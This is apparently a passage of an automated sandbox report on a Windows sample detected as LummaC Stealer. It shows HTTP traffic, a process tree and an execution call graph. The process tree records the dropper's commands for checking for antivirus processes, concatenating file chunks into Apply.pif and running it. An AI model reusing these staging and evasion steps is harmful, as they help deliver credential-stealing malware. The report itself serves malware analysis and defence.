                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: ac 70 15 24 3e 21 26 1e 45 e0 ee 10 e1 bd 48 55 fe a4 de 55 f2 ab d3 92 11 0f 20 ea 89 9f 49 95 c7 bb f5 b0 60 d2 39 69 21 a3 09 a1 4c a4 9c 4a 16 d7 48 4d 1d 53 25 d7 4c 92 18 3b 95 13 6d 02 c1 b1 50 f4 ea c8 52 20 d9 10 48 82 da 42 1a 7a 69 a2 a0 36 dc 62 af bd 2a f3 dc 0e d7 ac ea 32 2a 6c dc b8 68 b4 cc 33 17 b3 8e e1 0f 79 b9 f8 ce fe 3c 49 9b 1a ef a6 a8 9b 84 bb 23 ce 52 d7 f2 a0 0c 61 04 3f e3 1e b5 9b b8 02 66 91 8f 60 25 aa c6 b1 4a 78 49 04 1b dd df 33 53 3c d6 17 29 01 4e b6 f6 3e 35 02 59 56 e7 59 c4 bb 94 4c 54 e2 50 aa 98 d0 f9 5d 89 80 ae 1f 1d 1a fb f7 11 c4 f4 5b f5 99 ba a3 f0 c1 14 50 1d 25 b9 ae ca ec b8 cf 4a 98 08 2f 4a ea fa de b7 36 a7 ad ba 00 5a 03 fc e3 3e dc d7 e8 f8 02 64 8a 45 80 55 cb b8 32 75 02 27 40 9a 03 df 90 5a c9 57
                                                  Data Ascii: p$>!&EHUU I`9i!LJHMS%L;mPR HBzi6b*2*lh3y<I#Ra?f`%JxI3S<)N>5YVYLTP][P%J/J6Z>dEU2u'@ZW
                                                  2024-07-24 19:05:23 UTC816INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:23 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=kbdnnehiurikrtlsag1e9c4jpl; expires=Sun, 17-Nov-2024 12:52:02 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fnihs6eDJg46AnZspR0qK1aZyt7li1qN8cRCWjrUY08J%2BOka7554iFacdp8Kz5GvD%2B8a5vpUr0AekgcZms8mmMoS7JWCyg8pwkUMpuhJ07rnFgCU3%2FBe7djcSyNDIzmZIH02%2FJT8LX8jdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e6b29e10cb4-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:15:04:44
                                                  Start date:24/07/2024
                                                  Path:C:\Users\user\Desktop\80441fcf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\80441fcf.exe"
                                                  Imagebase:0x400000
                                                  File size:949'700 bytes
                                                  MD5 hash:D3C1C1A07FC43292E7E29E57C752D4C5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:15:04:44
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:15:04:45
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:15:04:45
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:15:04:46
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x2d0000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:15:04:46
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                  Imagebase:0xa0000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:15:04:47
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:15:04:47
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                  Imagebase:0xa0000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:15:04:47
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c md 5758
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:15:04:47
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:15:04:48
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c copy /b Ink 5758\o
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:15:04:48
                                                  Start date:24/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  Wow64 process (32bit):true
                                                  Commandline:5758\Apply.pif 5758\o
                                                  Imagebase:0x850000
                                                  File size:946'784 bytes
                                                  MD5 hash:848164D084384C49937F99D5B894253E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:15:04:48
                                                  Start date:24/07/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 5 127.0.0.1
                                                  Imagebase:0x770000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:12.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:15.2%
                                                    Total number of Nodes:1600
                                                    Total number of Limit Nodes:25
                                                    execution_graph 11887 41a923 11888 41a92f ___scrt_is_nonwritable_in_current_image 11887->11888 11911 41a444 11888->11911 11890 41a936 11891 41aa8f 11890->11891 11894 41a960 11890->11894 12102 41af8a IsProcessorFeaturePresent 11891->12102 11893 41aa96 exit 11895 41aa9c _exit 11893->11895 11896 41a964 _initterm_e 11894->11896 11899 41a9ad ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11894->11899 11897 41a990 _initterm 11896->11897 11898 41a97f 11896->11898 11897->11899 11900 41aa01 __p___argv __p___argc _get_initial_narrow_environment 11899->11900 11903 41a9f9 _register_thread_local_exe_atexit_callback 11899->11903 11919 404e5f _set_new_handler GetLastError GetTickCount 11900->11919 11902 41aa1d 12096 41b0ac GetModuleHandleW 11902->12096 11903->11900 11906 41aa2b 11907 41aa34 11906->11907 11908 41aa2f _cexit 11906->11908 12098 41a5d3 11907->12098 11908->11907 11912 41a44d 11911->11912 12106 41aaaf IsProcessorFeaturePresent 11912->12106 11916 41a45e pre_c_initialization 11917 41a462 11916->11917 12117 41b4af 11916->12117 11917->11890 11920 404e90 GetTickCount 11919->11920 11921 404ea2 11919->11921 11920->11921 11922 404e99 GetTickCount 11920->11922 12186 40e457 11921->12186 11922->11921 11925 40e457 3 API calls 11926 404ecf 11925->11926 11927 40e457 3 API calls 11926->11927 11928 404ed7 GetModuleHandleW GetProcAddress FreeConsole 11927->11928 12189 404b55 LoadLibraryA #17 11928->12189 11934 404f10 12218 403b58 11934->12218 11936 404f19 12230 404458 11936->12230 11939 404f3b 12235 402f39 11939->12235 11940 404f2f 12403 404c43 11940->12403 11943 404f4c GetModuleFileNameW 11944 404f67 11943->11944 11945 404f59 11943->11945 11947 404458 3 API calls 11944->11947 12419 407280 11945->12419 11948 404f8b 11947->11948 11949 404f34 11948->11949 12241 40e522 11948->12241 11949->11902 11951 404fa8 11952 40e522 3 API calls 11951->11952 11954 404fb3 11952->11954 11953 40503f 12245 4032f6 11953->12245 11954->11953 11956 40e589 3 API calls 11954->11956 11958 404fec 11956->11958 11960 40e589 3 API calls 11958->11960 11959 40e589 3 API calls 11961 405063 11959->11961 11966 405004 11960->11966 12248 40126c 11961->12248 11964 405090 12254 40e383 11964->12254 11965 405077 11967 407280 33 API calls 11965->11967 11968 40e522 3 API calls 11966->11968 11967->11949 11971 40502f 11968->11971 11970 405098 12257 40377f 11970->12257 12433 4030a0 11971->12433 11976 4050b3 11976->11949 11977 404458 3 API calls 11976->11977 11978 4050cc 11977->11978 11982 4050d4 11978->11982 11984 405139 11978->11984 11979 405145 wsprintfW 11981 4030a0 18 API calls 11979->11981 11980 40517e 12271 4048c0 11980->12271 11981->11984 11982->11949 12460 4047b0 11982->12460 11984->11979 11984->11980 12483 404033 11984->12483 11990 40511d 11990->11949 11992 407280 33 API calls 11990->11992 11992->11949 11997 405216 12347 404ae8 11997->12347 12001 405240 12004 4035c2 lstrcmpW 12001->12004 12002 4052a4 CoInitializeEx 12007 4035c2 lstrcmpW 12002->12007 12005 40524b 12004->12005 12008 40525a 12005->12008 12011 4030a0 18 API calls 12005->12011 12006 404033 5 API calls 12018 4051bb 12006->12018 12009 4052cc 12007->12009 12500 405798 12008->12500 12010 4052df 12009->12010 12013 40e589 3 API calls 12009->12013 12353 404757 12010->12353 12011->12008 12013->12010 12016 4035c2 lstrcmpW 12016->12018 12018->11997 12018->12006 12018->12016 12343 40e420 12018->12343 12019 4035c2 lstrcmpW 12031 4052eb 12019->12031 12020 40e457 3 API calls 12020->12031 12022 40531d GetKeyState 12022->12031 12023 40546f 12024 4054a6 12023->12024 12025 405478 12023->12025 12535 40e3ef 12024->12535 12364 402ac3 12025->12364 12031->11949 12031->12019 12031->12020 12031->12022 12031->12023 12036 405452 12031->12036 12040 40e589 RaiseException _callnewh malloc 12031->12040 12515 407180 12031->12515 12526 4013e1 12031->12526 12530 407379 12031->12530 12032 4054b4 12034 404757 7 API calls 12032->12034 12033 40e522 3 API calls 12039 405495 12033->12039 12035 4054bd 12034->12035 12038 40e522 3 API calls 12035->12038 12035->12039 12037 407280 33 API calls 12036->12037 12037->11949 12038->12039 12377 401e72 12039->12377 12040->12031 12042 40551d 12043 405522 12042->12043 12044 40552e 12042->12044 12538 404b3f 12043->12538 12046 404ae8 8 API calls 12044->12046 12047 405533 12046->12047 12048 40568f 12047->12048 12049 40e457 3 API calls 12047->12049 12052 40571f 12048->12052 12054 4035c2 lstrcmpW 12048->12054 12050 405551 12049->12050 12051 40e457 3 API calls 12050->12051 12053 405559 12051->12053 12052->11949 12056 4035c2 lstrcmpW 12052->12056 12055 40556b 12053->12055 12542 401b16 12053->12542 12057 4056cc 12054->12057 12060 405576 12055->12060 12061 40562c 12055->12061 12059 40573f 12056->12059 12057->12052 12065 405798 5 API calls 12057->12065 12059->11949 12066 40574b 12059->12066 12063 405583 12060->12063 12064 405645 12060->12064 12392 4017ca 12061->12392 12551 40e635 12063->12551 12067 404ae8 8 API calls 12064->12067 12069 4056f5 12065->12069 12070 40e3ef 3 API calls 12066->12070 12071 40564d 12067->12071 12073 4073d3 7 API calls 12069->12073 12074 40575a 12070->12074 12623 404607 12071->12623 12073->12052 12632 4042ae 12074->12632 12076 40e635 3 API calls 12079 4055a4 12076->12079 12078 405664 SetCurrentDirectoryW 12080 404607 4 API calls 12078->12080 12081 40e589 3 API calls 12079->12081 12082 40568a 12080->12082 12084 4055b1 12081->12084 12083 404b3f 17 API calls 12082->12083 12083->12048 12085 4055c1 GetFileAttributesW 12084->12085 12086 4055d1 12085->12086 12087 4055fa 12085->12087 12088 404b3f 17 API calls 12086->12088 12089 40e420 3 API calls 12087->12089 12090 4055d6 12088->12090 12091 40560d 12089->12091 12093 407280 33 API calls 12090->12093 12555 401896 12091->12555 12095 4055df 12093->12095 12094 40561f 12094->12064 12095->11949 12097 41aa27 12096->12097 12097->11893 12097->11906 12100 41a5df pre_c_initialization 12098->12100 12099 41a5f5 12099->11898 12100->12099 12101 41b4af ___vcrt_uninitialize 10 API calls 12100->12101 12101->12099 12103 41af9f ___scrt_fastfail 12102->12103 12104 41b04a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12103->12104 12105 41b095 ___scrt_fastfail 12104->12105 12105->11893 12107 41a459 12106->12107 12108 41b486 12107->12108 12109 41b48b ___vcrt_initialize_winapi_thunks 12108->12109 12125 41a317 12109->12125 12112 41b499 12112->11916 12114 41b4a1 12115 41b4ac 12114->12115 12139 41a353 12114->12139 12115->11916 12118 41b4b8 12117->12118 12124 41b4c9 12117->12124 12119 418643 ___vcrt_uninitialize_ptd 8 API calls 12118->12119 12120 41b4bd 12119->12120 12121 41a353 ___vcrt_uninitialize_locks DeleteCriticalSection 12120->12121 12122 41b4c2 12121->12122 12182 419d93 12122->12182 12124->11917 12126 41a320 12125->12126 12128 41a349 12126->12128 12129 41a345 12126->12129 12143 419d23 12126->12143 12130 41a353 ___vcrt_uninitialize_locks DeleteCriticalSection 12128->12130 12129->12112 12131 418610 12129->12131 12130->12129 12163 419c34 12131->12163 12134 418625 12134->12114 12137 418640 12137->12114 12140 41a37d 12139->12140 12141 41a35e 12139->12141 12140->12112 12142 41a368 DeleteCriticalSection 12141->12142 12142->12140 12142->12142 12148 419bc5 12143->12148 12145 419d3d 12146 419d5b InitializeCriticalSectionAndSpinCount 12145->12146 12147 419d46 12145->12147 12146->12147 12147->12126 12149 419bed 12148->12149 12153 419be9 __crt_fast_encode_pointer 12148->12153 12149->12153 12154 419b01 12149->12154 12152 419c07 GetProcAddress 12152->12153 12153->12145 12160 419b10 12154->12160 12155 419bba 12155->12152 12155->12153 12156 419b2d LoadLibraryExW 12157 419b48 GetLastError 12156->12157 12156->12160 12159 419b53 wcsncmp 12157->12159 12157->12160 12158 419ba3 FreeLibrary 12158->12160 12159->12160 12161 419b67 wcsncmp 12159->12161 12160->12155 12160->12156 12160->12158 12161->12160 12162 419b7b LoadLibraryExW 12161->12162 12162->12160 12164 419bc5 try_get_function 7 API calls 12163->12164 12165 419c4e 12164->12165 12166 419c67 TlsAlloc 12165->12166 12167 41861a 12165->12167 12167->12134 12168 419ce5 12167->12168 12169 419bc5 try_get_function 7 API calls 12168->12169 12170 419cff 12169->12170 12171 419d1a TlsSetValue 12170->12171 12172 418633 12170->12172 12171->12172 12172->12137 12173 418643 12172->12173 12174 41864d 12173->12174 12176 418653 12173->12176 12177 419c6f 12174->12177 12176->12134 12178 419bc5 try_get_function 7 API calls 12177->12178 12179 419c89 12178->12179 12180 419ca1 TlsFree 12179->12180 12181 419c95 12179->12181 12180->12181 12181->12176 12183 419d9c 12182->12183 12185 419dc2 12182->12185 12184 419dac FreeLibrary 12183->12184 12183->12185 12184->12183 12185->12124 12670 41a3c5 12186->12670 12190 404b7c 12189->12190 12191 4030a0 18 API calls 12190->12191 12192 404b83 12191->12192 12193 4030a0 18 API calls 12192->12193 12194 404b8f 12193->12194 12195 4030a0 18 API calls 12194->12195 12196 404b9b 12195->12196 12197 4030a0 18 API calls 12196->12197 12198 404ba7 12197->12198 12199 4030a0 18 API calls 12198->12199 12200 404bb3 12199->12200 12201 4030a0 18 API calls 12200->12201 12202 404bbf 12201->12202 12203 404bd7 SHGetSpecialFolderPathW 12202->12203 12206 404c3e GetCommandLineW 12202->12206 12207 404033 5 API calls 12202->12207 12203->12202 12204 404beb wsprintfW 12203->12204 12205 404033 5 API calls 12204->12205 12205->12202 12208 403800 12206->12208 12207->12202 12210 403855 12208->12210 12211 403816 12208->12211 12209 403845 12214 40e589 12209->12214 12210->12209 12212 4013e1 3 API calls 12210->12212 12211->12209 12213 4013e1 3 API calls 12211->12213 12212->12210 12213->12211 12215 40e599 12214->12215 12216 41a3c5 3 API calls 12215->12216 12217 40e5b8 12215->12217 12216->12217 12217->11934 12219 40e457 3 API calls 12218->12219 12229 403b67 12219->12229 12220 403c60 12221 40e522 3 API calls 12220->12221 12222 403c6e 12221->12222 12222->11936 12223 4013e1 RaiseException _callnewh malloc 12223->12229 12225 40e457 3 API calls 12225->12229 12227 40e522 3 API calls 12227->12229 12229->12220 12229->12223 12229->12225 12229->12227 12683 40e362 12229->12683 12686 4040ff 12229->12686 12692 40e6b9 12229->12692 12231 40446d 12230->12231 12232 40449f lstrlenW lstrlenW 12231->12232 12233 4044c0 12231->12233 12710 403951 12232->12710 12233->11939 12233->11940 12236 40e3ef 3 API calls 12235->12236 12238 402f4d 12236->12238 12237 402f63 wcsncpy 12240 402f77 12237->12240 12238->12237 12722 40e977 12238->12722 12240->11943 12242 40e530 12241->12242 12244 40e550 12241->12244 12243 41a3c5 3 API calls 12242->12243 12242->12244 12243->12244 12244->11951 12729 4032cb GetProcAddress 12245->12729 12247 4032fb 12247->11959 12249 401277 12248->12249 12252 401296 12249->12252 12732 40d63b 12249->12732 12252->11964 12252->11965 12255 41a3c5 3 API calls 12254->12255 12256 40e390 12255->12256 12256->11970 12258 40e383 3 API calls 12257->12258 12259 40378f 12258->12259 12270 40d63b 3 API calls 12259->12270 12260 40379e 12760 4039f5 12260->12760 12263 4037c7 12265 4037d6 12263->12265 12768 40330e 12263->12768 12264 4037b9 12266 407280 33 API calls 12264->12266 12268 4037c1 12265->12268 12786 40e47b 12265->12786 12266->12268 12268->11976 12270->12260 12272 40e589 3 API calls 12271->12272 12273 4048d3 12272->12273 12274 40e6f7 3 API calls 12273->12274 12275 4048dd 12274->12275 12276 40147d 12275->12276 12280 401489 12276->12280 12277 4016d2 12277->11949 12283 4048e2 12277->12283 12278 403744 lstrlenW lstrlenW _wcsnicmp 12278->12280 12280->12277 12280->12278 12281 401669 _wtol 12280->12281 12862 401414 12280->12862 12873 4016df 12280->12873 12281->12280 12284 4035c2 lstrcmpW 12283->12284 12285 4048f5 12284->12285 12286 40491b 12285->12286 12288 40e589 3 API calls 12285->12288 12287 4035c2 lstrcmpW 12286->12287 12289 404937 12287->12289 12290 40490b 12288->12290 12291 4035c2 lstrcmpW 12289->12291 12292 4030a0 18 API calls 12290->12292 12293 404953 12291->12293 12294 404912 12292->12294 12295 4035c2 lstrcmpW 12293->12295 12296 40e6f7 3 API calls 12294->12296 12297 40496f 12295->12297 12296->12286 12298 404996 12297->12298 12299 404979 lstrcmpiW 12297->12299 12300 4035c2 lstrcmpW 12298->12300 12299->12298 12301 4049a1 12300->12301 12302 4035c2 lstrcmpW 12301->12302 12303 4049c5 12302->12303 12306 4049d1 12303->12306 12906 404ded 12303->12906 12305 4035c2 lstrcmpW 12310 4049e4 12305->12310 12306->12305 12307 404a02 12309 4035c2 lstrcmpW 12307->12309 12315 404a14 12309->12315 12310->12307 12311 4035c2 lstrcmpW 12310->12311 12910 404d8a 12310->12910 12311->12310 12312 404a32 12314 4035c2 lstrcmpW 12312->12314 12316 404a3d 12314->12316 12315->12312 12317 4035c2 lstrcmpW 12315->12317 12914 404dbc 12315->12914 12318 4035c2 lstrcmpW 12316->12318 12317->12315 12319 404a4d 12318->12319 12320 4035c2 lstrcmpW 12319->12320 12321 404a5d 12320->12321 12322 404a73 12321->12322 12323 404a6a _wtol 12321->12323 12324 4035c2 lstrcmpW 12322->12324 12323->12322 12325 404a7e 12324->12325 12326 404a84 _wtol 12325->12326 12327 404a8d 12325->12327 12326->12327 12328 4035c2 lstrcmpW 12327->12328 12329 404a98 12328->12329 12330 4035c2 lstrcmpW 12329->12330 12331 404ab4 12330->12331 12332 4035c2 lstrcmpW 12331->12332 12333 404ad0 12332->12333 12334 4012a1 12333->12334 12335 4012a9 12334->12335 12336 4012cf 12335->12336 12338 40d63b 3 API calls 12335->12338 12340 4035c2 12336->12340 12337 4012bd 12922 409b35 12337->12922 12338->12337 12341 402fbe lstrcmpW 12340->12341 12342 4035d0 12341->12342 12342->12018 12344 40e42f 12343->12344 12948 40eb5e 12344->12948 12346 40e43a 12346->12018 12348 404b3c 12347->12348 12350 404af9 12347->12350 12348->12001 12348->12002 12349 40e3ef 3 API calls 12349->12350 12350->12348 12350->12349 12951 40478e 12350->12951 12354 402d84 6 API calls 12353->12354 12355 404764 12354->12355 12356 403dac 4 API calls 12355->12356 12357 404771 12356->12357 12358 403cf1 4 API calls 12357->12358 12359 40477c 12358->12359 12360 403f22 4 API calls 12359->12360 12361 404782 12360->12361 12362 402d84 6 API calls 12361->12362 12363 404788 12362->12363 12363->12031 12365 40e457 3 API calls 12364->12365 12366 402ad3 12365->12366 12367 402f39 4 API calls 12366->12367 12368 402adc GetTempPathW 12367->12368 12369 402af7 12368->12369 12373 402b10 12368->12373 12370 402f39 4 API calls 12369->12370 12372 402b00 GetTempPathW 12370->12372 12371 402f39 4 API calls 12374 402b2b wsprintfW 12371->12374 12372->12373 12373->12371 12375 402b41 GetFileAttributesW 12373->12375 12376 402b69 12373->12376 12374->12373 12375->12373 12375->12376 12376->12033 12378 4012a1 8 API calls 12377->12378 12379 401e7f 12378->12379 12380 401e83 12379->12380 12381 401e95 12379->12381 12383 407280 33 API calls 12380->12383 13067 402648 lstrlenW 12381->13067 12385 401e8c 12383->12385 12384 401ea0 12386 401ea5 12384->12386 12387 41a382 3 API calls 12384->12387 12385->12042 12386->12042 12388 401eb3 12387->12388 12389 401ebf 12388->12389 13104 401cd8 12388->13104 13086 401d61 12389->13086 12393 40e420 3 API calls 12392->12393 12394 4017e2 12393->12394 12395 4013e1 3 API calls 12394->12395 12396 4017f1 12395->12396 12397 4035c2 lstrcmpW 12396->12397 12398 40e420 3 API calls 12396->12398 12399 401896 63 API calls 12396->12399 12400 401885 12396->12400 12401 40e589 3 API calls 12396->12401 12402 4013e1 3 API calls 12396->12402 12397->12396 12398->12396 12399->12396 12400->12064 12401->12396 12402->12396 12404 405798 5 API calls 12403->12404 12405 404c5f 12404->12405 12406 4030a0 18 API calls 12405->12406 12407 404c6d 12406->12407 12408 40e420 3 API calls 12407->12408 12409 404c77 12408->12409 12410 404cad 12409->12410 12412 40e6f7 3 API calls 12409->12412 13643 40e738 12409->13643 12411 40e6f7 3 API calls 12410->12411 12414 404cbc 12411->12414 12412->12409 12415 40e6f7 3 API calls 12414->12415 12416 404cc9 12415->12416 12417 4073d3 7 API calls 12416->12417 12418 404cde 12417->12418 12418->11949 12420 4030a0 18 API calls 12419->12420 12421 407294 wvsprintfW 12420->12421 12422 4072b4 GetLastError FormatMessageW 12421->12422 12423 407367 12421->12423 12425 4072e2 FormatMessageW 12422->12425 12426 4072f9 lstrlenW lstrlenW 12422->12426 12424 407573 9 API calls 12423->12424 12427 407373 12424->12427 12425->12423 12425->12426 12428 41a3c5 3 API calls 12426->12428 12427->11949 12429 407328 lstrcpyW lstrcpyW 12428->12429 13647 407573 12429->13647 12431 407354 12432 40735a LocalFree 12431->12432 12432->12427 12434 4030b6 12433->12434 12435 4030e0 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 12434->12435 12436 4030d6 12434->12436 12437 40318a SetLastError 12435->12437 12438 40311b 12435->12438 12456 40e6f7 12436->12456 12437->12436 12440 4031a1 12437->12440 12439 41a3c5 3 API calls 12438->12439 12441 40312f GetEnvironmentVariableW 12439->12441 12442 4031c2 lstrlenA 12440->12442 12443 4031af 12440->12443 12445 403147 GetLastError 12441->12445 12451 403163 collate 12441->12451 12446 41a3c5 3 API calls 12442->12446 13653 4035df 12443->13653 12448 40314d 12445->12448 12445->12451 12449 4031e3 12446->12449 12447 4031b4 12447->12442 12450 403157 lstrcmpiW 12448->12450 12448->12451 12452 4031f5 GetLocaleInfoW 12449->12452 12453 40323a MultiByteToWideChar 12449->12453 12450->12451 12451->12437 12454 403234 12452->12454 12455 40321c _wtol 12452->12455 12453->12436 12454->12453 12455->12453 12457 40e706 12456->12457 12458 40e843 3 API calls 12457->12458 12459 40e711 12458->12459 12459->11953 12461 40d1c2 2 API calls 12460->12461 12462 4047de 12461->12462 12464 40e420 3 API calls 12462->12464 12481 404833 12462->12481 12463 40e383 3 API calls 12465 40484c 12463->12465 12469 4047ed 12464->12469 13659 40e4cb 12465->13659 12467 404859 13663 40e67f 12467->13663 12471 402648 59 API calls 12469->12471 12475 404893 12469->12475 12473 404815 12471->12473 12472 40e67f 3 API calls 12474 404873 12472->12474 12473->12475 12477 40d1c2 2 API calls 12473->12477 12476 40e67f 3 API calls 12474->12476 12478 40d16e CloseHandle 12475->12478 12480 404880 12476->12480 12477->12481 12479 4048b5 12478->12479 12479->11990 13667 40d739 12480->13667 12481->12463 12481->12475 12484 40e457 3 API calls 12483->12484 12485 404041 12484->12485 12486 40e457 3 API calls 12485->12486 12487 404049 12486->12487 12488 40e589 3 API calls 12487->12488 12489 404054 12488->12489 12490 40e589 3 API calls 12489->12490 12491 40405f 12490->12491 12492 402549 5 API calls 12491->12492 12493 40406d 12492->12493 12494 40e420 3 API calls 12493->12494 12497 404098 12493->12497 12495 404080 12494->12495 12496 40e6f7 3 API calls 12495->12496 12498 40408b 12496->12498 12497->11984 12499 404033 5 API calls 12498->12499 12499->12497 12501 40e457 3 API calls 12500->12501 12502 4057a9 12501->12502 12503 405268 12502->12503 12504 4057d1 GetSystemMetrics GetSystemMetrics 12502->12504 12505 4073d3 12503->12505 12504->12503 12506 4073e2 12505->12506 12514 407410 12505->12514 12507 40e420 3 API calls 12506->12507 12506->12514 12508 4073f3 12507->12508 12509 40e420 3 API calls 12508->12509 12510 4073fe 12509->12510 12511 40478e 7 API calls 12510->12511 12512 407407 12511->12512 12513 40478e 7 API calls 12512->12513 12513->12514 12514->11949 12516 40719c 12515->12516 12517 4071b3 12516->12517 12518 4071e6 12516->12518 12520 405798 5 API calls 12517->12520 12519 405798 5 API calls 12518->12519 12521 4071ee 12519->12521 12522 4071bb 12520->12522 12523 4073d3 7 API calls 12521->12523 12524 4073d3 7 API calls 12522->12524 12525 4071da 12523->12525 12524->12525 12525->12031 12527 4013f4 12526->12527 12528 4013ef 12526->12528 12527->12031 13681 40e887 12528->13681 12531 405798 5 API calls 12530->12531 12532 